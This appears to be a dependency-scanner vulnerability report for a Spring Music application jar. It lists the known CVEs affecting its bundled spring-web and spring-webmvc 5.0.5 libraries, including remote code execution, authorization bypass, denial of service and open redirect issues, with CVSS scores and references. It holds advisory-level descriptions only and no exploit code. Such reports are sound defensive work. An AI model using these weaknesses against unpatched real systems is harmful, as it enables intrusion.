In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive, which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path.
CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2022-22970
In Spring Framework versions prior to 5.3.20 and 5.2.22, and older unsupported versions, applications that handle file uploads are vulnerable to a DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A
CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-web-5.0.5.RELEASE.jar
Description: Spring Web
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-web-5.0.5.RELEASE.jar
MD5: de6aff2fbceef7fdcafe9e1cc1245c0a
SHA1: d51dbb5cabe72ae02e400577bac48f7fc94088de
SHA256: 810373a45d353a52978b132fa0da4f954b6d05d78a4b7e4de25c9d2bcf64840b
Evidence:
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | spring-web | Highest
Vendor | central | groupid | org.springframework | Highest
Vendor | file | name | spring-web | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | springframework | Low
Vendor | jar | package name | web | Highest
Vendor | jar | package name | web | Low
Vendor | Manifest | automatic-module-name | spring.web | Medium
Vendor | pom | artifactid | spring-web | Low
Vendor | pom | developer email | jhoeller@pivotal.io | Low
Vendor | pom | developer id | jhoeller | Medium
Vendor | pom | developer name | Juergen Hoeller | Medium
Vendor | pom | groupid | org.springframework | Highest
Vendor | pom | name | Spring Web | High
Vendor | pom | organization name | Spring IO | High
Vendor | pom | organization url | http://projects.spring.io/spring-framework | Medium
Vendor | pom | url | spring-projects/spring-framework | Highest
Product | central | artifactid | spring-web | Highest
Product | file | name | spring-web | High
Product | hint analyzer | product | springsource_spring_framework | Highest
Product | jar | package name | web | Highest
Product | jar | package name | web | Low
Product | Manifest | automatic-module-name | spring.web | Medium
Product | Manifest | Implementation-Title | spring-web | High
Product | pom | artifactid | spring-web | Highest
Product | pom | developer email | jhoeller@pivotal.io | Low
Product | pom | developer id | jhoeller | Low
Product | pom | developer name | Juergen Hoeller | Low
Product | pom | groupid | org.springframework | Highest
Product | pom | name | Spring Web | High
Product | pom | organization name | Spring IO | Low
Product | pom | organization url | http://projects.spring.io/spring-framework | Low
Product | pom | url | spring-projects/spring-framework | High
Version | central | version | 5.0.5.RELEASE | Highest
Version | Manifest | Implementation-Version | 5.0.5.RELEASE | High
Version | pom | version | 5.0.5.RELEASE | Highest
CVE-2016-1000027
Pivotal Spring Framework through 5.3.16 suffers from a potential remote code execution (RCE) issue if used for Java deserialization of untrusted data. Depending on how the library is implemented within a product, this issue may or may not occur, and authentication may be required. NOTE: the vendor's position is that untrusted data is not an intended use case. The product's behavior will not be changed because some users rely on deserialization of trusted data.
CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
* OSSIndex - [CVE-2016-1000027] CWE-502: Deserialization of Untrusted Data
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1000027
* OSSIndex - https://blog.gypsyengineer.com/en/security/detecting-dangerous-spring-exporters-with-codeql.html
* OSSIndex - https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2016-1000027
* OSSIndex - https://github.com/spring-projects/spring-framework/issues/24434
* OSSIndex - https://www.tenable.com/security/research/tra-2016-20
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and cve@mitre.org): reference links tagged BROKEN_LINK, EXPLOIT, ISSUE_TRACKING, RELEASE_NOTES and THIRD_PARTY_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2022-22965
CISA Known Exploited Vulnerability:
Product: VMware Spring Framework
Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability
Date Added: 2022-04-04
Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.
Required Action: Apply updates per vendor instructions.
Due Date: 2022-04-25
Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it.
CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and security@vmware.com): reference links tagged EXPLOIT, MITIGATION, PATCH, THIRD_PARTY_ADVISORY, US_GOVERNMENT_RESOURCE, VDB_ENTRY and VENDOR_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2018-1258
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted.
CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P
References:
* OSSIndex - [CVE-2018-1258] CWE-863: Incorrect Authorization
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258
* OSSIndex - https://jira.spring.io/browse/SPR-16757
* OSSIndex - https://pivotal.io/security/cve-2018-1258
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and security_alert@emc.com): reference links tagged PATCH, THIRD_PARTY_ADVISORY, VDB_ENTRY and VENDOR_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2024-38809 (OSSINDEX)
Applications that parse ETags from "If-Match" or "If-None-Match" request headers are vulnerable to a DoS attack.
Users of affected versions should upgrade to the corresponding fixed version.
Users of older, unsupported versions could enforce a size limit on "If-Match" and "If-None-Match" headers, e.g. through a Filter.
CWE-400 Uncontrolled Resource Consumption
CVSSv4:
Base Score: HIGH (8.7) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2024-22243 (OSSINDEX)
Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to an SSRF attack if the URL is used after passing validation checks.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2024-22243 for details.
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2024-22262 (OSSINDEX)
Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to an SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22259 (https://spring.io/security/cve-2024-22259) and CVE-2024-22243 (https://spring.io/security/cve-2024-22243), but with different input.
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2024-22259
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to an SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 (https://spring.io/security/cve-2024-22243), but with different input.
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2021-22118 (OSSINDEX)
In Spring Framework, versions 5.2.x prior to 5.2.15 and versions 5.3.x prior to 5.3.7, a WebFlux application is vulnerable to a privilege escalation: by (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2021-22118 for details.
CWE-269 Improper Privilege Management
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2018-11040
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Neither is enabled by default in Spring Framework or Spring Boot; however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests.
CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
* OSSIndex - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040
* OSSIndex - https://jira.spring.io/browse/SPR-16798
* OSSIndex - https://pivotal.io/security/cve-2018-11040
* NVD (sources af854a3a-2127-422b-91ae-364da2661108 and security_alert@emc.com): reference links tagged MAILING_LIST, MITIGATION, PATCH, THIRD_PARTY_ADVISORY and VENDOR_ADVISORY; link targets are not included in this export
Vulnerable Software & Versions:
CVE-2018-15756 suppress
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
* OSSINDEX - [CVE-2018-15756] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756
* OSSIndex - https://pivotal.io/security/cve-2018-15756
Vulnerable Software & Versions:
CVE-2020-5398
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.6)
Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C
References:
Vulnerable Software & Versions:
CVE-2025-41234 (OSSINDEX)
Description
In Spring Framework, versions 6.0.x as of 6.0.5, versions 6.1.x and 6.2.x, an application is vulnerable to a reflected file download (RFD) attack when it sets a “Content-Disposition” header with a non-ASCII charset, where the filename attribute is derived from user-supplied input.
Specifically, an application is vulnerable when all the following are true:
* The header is prepared with org.springframework.http.ContentDisposition.
* The filename is set via ContentDisposition.Builder#filename(String, Charset).
* The value for the filename is derived from user-supplied input.
* The application does not sanitize the user-supplied input.
* The downloaded content of the response is injected with malicious commands by the attacker (see RFD paper reference for details).
An application is not vulnerable if any of the following is true:
* The application does not set a “Content-Disposition” response header.
* The header is not prepared with org.springframework.http.ContentDisposition.
* The filename is set via one of:
  * ContentDisposition.Builder#filename(String), or
  * ContentDisposition.Builder#filename(String, ASCII)
* The filename is not derived from user-supplied input.
* The filename is derived from user-supplied input but sanitized by the application.
* The attacker cannot inject malicious content in the downloaded content of the response.
Affected Spring Products and Versions
Spring Framework:
* 6.2.0 - 6.2.7
* 6.1.0 - 6.1.20
* 6.0.5 - 6.0.28
* Older, unsupported versions are not affected
Mitigation
Users of affected versions should upgrade to the corresponding fixed version.
Affected version(s) | Fix version | Availability
6.2.x | 6.2.8 | OSS
6.1.x | 6.1.21 | OSS
6.0.x | 6.0.29 | Commercial (https://enterprise.spring.io/)
No further mitigation steps are necessary.
CWE-113 in `Content-Disposition` handling in VMware Spring Framework versions 6.0.5 to 6.2.7 allows remote attackers to launch Reflected File Download (RFD) attacks via unsanitized user input in `ContentDisposition.Builder#filename(String, Charset)` with non-ASCII charsets.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-41234 for details.
CWE-113 Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
CVSSv2:
Base Score: HIGH (7.400000095367432)
Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2024-38828 (OSSINDEX)
Spring MVC controller methods with an @RequestBody byte[] method parameter are vulnerable to a DoS attack. CWE-400 Uncontrolled Resource Consumption
CVSSv2:
Base Score: MEDIUM (6.900000095367432)
Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:*
CVE-2018-1257
Spring Framework, versions 5.0.x prior to 5.0.6, versions 4.3.x prior to 4.3.17, and older unsupported versions allows applications to expose STOMP over WebSocket endpoints with a simple, in-memory STOMP broker through the spring-messaging module. A malicious user (or attacker) can craft a message to the broker that can lead to a regular expression, denial of service attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.0)
Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P
References:
* OSSINDEX - [CVE-2018-1257] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1257
* OSSIndex - https://jira.spring.io/browse/SPR-16731
* OSSIndex - https://pivotal.io/security/cve-2018-1257
Vulnerable Software & Versions:
CVE-2020-5421
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jsessionid path parameter. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:N/E:1.3/RC:R/MAV:A
CVSSv2:
Base Score: LOW (3.6)
Vector: /AV:N/AC:H/Au:S/C:P/I:P/A:N
References:
* OSSINDEX - [CVE-2020-5421] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5421
* OSSIndex - https://tanzu.vmware.com/security/cve-2020-5421
Vulnerable Software & Versions:
CVE-2022-22950
In Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.0)
Vector: /AV:N/AC:L/Au:S/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2023-20861
In Spring Framework versions 6.0.0 - 6.0.6, 5.3.0 - 5.3.25, 5.2.0.RELEASE - 5.2.22.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial-of-service (DoS) condition. CWE-400 Uncontrolled Resource Consumption, NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2018-11039
Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack. NVD-CWE-noinfo
CVSSv3:
Base Score: MEDIUM (5.9)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:2.2/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
* OSSINDEX - [CVE-2018-11039] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039
* OSSIndex - https://jira.spring.io/browse/SPR-16836
* OSSIndex - https://pivotal.io/security/cve-2018-11039
Vulnerable Software & Versions:
CVE-2022-22968
In Spring Framework versions 5.3.0 - 5.3.18, 5.2.0 - 5.2.20, and older unsupported versions, the patterns for disallowedFields on a DataBinder are case sensitive which means a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including upper and lower case for the first character of all nested fields within the property path. CWE-178 Improper Handling of Case Sensitivity
CVSSv3:
Base Score: MEDIUM (5.3)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:P/A:N
References:
Vulnerable Software & Versions:
CVE-2022-22970
In Spring Framework versions prior to 5.3.20+, 5.2.22+ and older unsupported versions, applications that handle file uploads are vulnerable to a DoS attack if they rely on data binding to set a MultipartFile or javax.servlet.Part to a field in a model object. CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: MEDIUM (5.3)
Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H/E:1.6/RC:R/MAV:A
CVSSv2:
Base Score: LOW (3.5)
Vector: /AV:N/AC:M/Au:S/C:N/I:N/A:P
References:
Vulnerable Software & Versions:
CVE-2021-22096 (OSSINDEX)
In Spring Framework versions 5.3.0 - 5.3.10, 5.2.0 - 5.2.17, and older unsupported versions, it is possible for a user to provide malicious input to cause the insertion of additional log entries. CWE-117 Improper Output Neutralization for Logs
CVSSv3:
Base Score: MEDIUM (4.300000190734863)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework:spring-web:5.0.5.RELEASE:*:*:*:*:*:*:*
spring-music-sqldb-1.0.jar: spring-webmvc-5.0.5.RELEASE.jar
Description: Spring Web MVC
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-webmvc-5.0.5.RELEASE.jar
MD5: 34339930599a55ee87ac9bfd08d1aca3
SHA1: 0a7fd53c7ad06b0fa7dd4ff347de1b2dc508739e
SHA256: 9898bb0d8f3109434afc0e92754cc867ac6963227e9ca0100b7e4f2bf11a5658
Evidence
Type | Source | Name | Value | Confidence
Vendor | central | artifactid | spring-webmvc | Highest
Vendor | central | groupid | org.springframework | Highest
Vendor | file | name | spring-webmvc | High
Vendor | hint analyzer | vendor | pivotal software | Highest
Vendor | hint analyzer | vendor | SpringSource | Highest
Vendor | hint analyzer | vendor | vmware | Highest
Vendor | jar | package name | servlet | Low
Vendor | jar | package name | springframework | Low
Vendor | jar | package name | web | Low
Vendor | Manifest | automatic-module-name | spring.webmvc | Medium
Vendor | pom | artifactid | spring-webmvc | Low
Vendor | pom | developer email | jhoeller@pivotal.io | Low
Vendor | pom | developer id | jhoeller | Medium
Vendor | pom | developer name | Juergen Hoeller | Medium
Vendor | pom | groupid | org.springframework | Highest
Vendor | pom | name | Spring Web MVC | High
Vendor | pom | organization name | Spring IO | High
Vendor | pom | organization url | http://projects.spring.io/spring-framework | Medium
Vendor | pom | url | spring-projects/spring-framework | Highest
Product | central | artifactid | spring-webmvc | Highest
Product | file | name | spring-webmvc | High
Product | hint analyzer | product | springsource_spring_framework | Highest
Product | jar | package name | servlet | Low
Product | jar | package name | web | Low
Product | Manifest | automatic-module-name | spring.webmvc | Medium
Product | Manifest | Implementation-Title | spring-webmvc | High
Product | pom | artifactid | spring-webmvc | Highest
Product | pom | developer email | jhoeller@pivotal.io | Low
Product | pom | developer id | jhoeller | Low
Product | pom | developer name | Juergen Hoeller | Low
Product | pom | groupid | org.springframework | Highest
Product | pom | name | Spring Web MVC | High
Product | pom | organization name | Spring IO | Low
Product | pom | organization url | http://projects.spring.io/spring-framework | Low
Product | pom | url | spring-projects/spring-framework | High
Version | central | version | 5.0.5.RELEASE | Highest
Version | Manifest | Implementation-Version | 5.0.5.RELEASE | High
Version | pom | version | 5.0.5.RELEASE | Highest
CVE-2022-22965
CISA Known Exploited Vulnerability:
Product: VMware Spring Framework
Name: Spring Framework JDK 9+ Remote Code Execution Vulnerability
Date Added: 2022-04-04
Description: Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.
Required Action: Apply updates per vendor instructions.
Due Date: 2022-04-25
Notes: https://nvd.nist.gov/vuln/detail/CVE-2022-22965
A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. CWE-94 Improper Control of Generation of Code ('Code Injection')
CVSSv3:
Base Score: CRITICAL (9.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.5)
Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P
References:
Vulnerable Software & Versions:
CVE-2018-1258
Spring Framework version 5.0.5 when used in combination with any versions of Spring Security contains an authorization bypass when using method security. An unauthorized malicious user can gain unauthorized access to methods that should be restricted. CWE-863 Incorrect Authorization
CVSSv3:
Base Score: HIGH (8.8)
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:2.8/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (6.5)
Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P
References:
* OSSINDEX - [CVE-2018-1258] CWE-863: Incorrect Authorization
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-1258
* OSSIndex - https://jira.spring.io/browse/SPR-16757
* OSSIndex - https://pivotal.io/security/cve-2018-1258
Vulnerable Software & Versions:
CVE-2024-22259
Applications that use UriComponentsBuilder in Spring Framework to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to an open redirect (https://cwe.mitre.org/data/definitions/601.html) attack or to an SSRF attack if the URL is used after passing validation checks.
This is the same as CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input. CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
CVSSv3:
Base Score: HIGH (8.1)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N/E:2.8/RC:R/MAV:A
References:
Vulnerable Software & Versions:
CVE-2018-11040
Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the "jsonp" and "callback" JSONP parameters, enabling cross-domain requests. CWE-829 Inclusion of Functionality from Untrusted Control Sphere
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (4.3)
Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N
References:
* OSSINDEX - [CVE-2018-11040] CWE-829: Inclusion of Functionality from Untrusted Control Sphere
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11040
* OSSIndex - https://jira.spring.io/browse/SPR-16798
* OSSIndex - https://pivotal.io/security/cve-2018-11040
Vulnerable Software & Versions:
CVE-2018-15756
Spring Framework, version 5.1, versions 5.0.x prior to 5.0.10, versions 4.3.x prior to 4.3.20, and older unsupported versions on the 4.2.x branch provide support for range requests when serving static resources through the ResourceHttpRequestHandler, or starting in 5.0 when an annotated controller returns an org.springframework.core.io.Resource. A malicious user (or attacker) can add a range header with a high number of ranges, or with wide ranges that overlap, or both, for a denial of service attack. This vulnerability affects applications that depend on either spring-webmvc or spring-webflux. Such applications must also have a registration for serving static resources (e.g. JS, CSS, images, and others), or have an annotated controller that returns an org.springframework.core.io.Resource. Spring Boot applications that depend on spring-boot-starter-web or spring-boot-starter-webflux are ready to serve static resources out of the box and are therefore vulnerable. NVD-CWE-noinfo
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A
CVSSv2:
Base Score: MEDIUM (5.0)
Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P
References:
* OSSINDEX - [CVE-2018-15756] CWE-noinfo
* OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756
* OSSIndex - https://pivotal.io/security/cve-2018-15756
Vulnerable Software & Versions:
CVE-2020-5398
In Spring Framework, versions 5.2.x prior to 5.2.3, versions 5.1.x prior to 5.1.13, and versions 5.0.x prior to 5.0.16, an application is vulnerable to a reflected file download (RFD) attack when it sets a "Content-Disposition" header in the response where the filename attribute is derived from user supplied input. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), CWE-494 Download of Code Without Integrity Check
CVSSv3:
Base Score: HIGH (7.5)
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H/E:1.6/RC:R/MAV:A
CVSSv2:
Base Score: HIGH (7.6)
Vector: /AV:N/AC:H/Au:N/C:C/I:C/A:C
References:
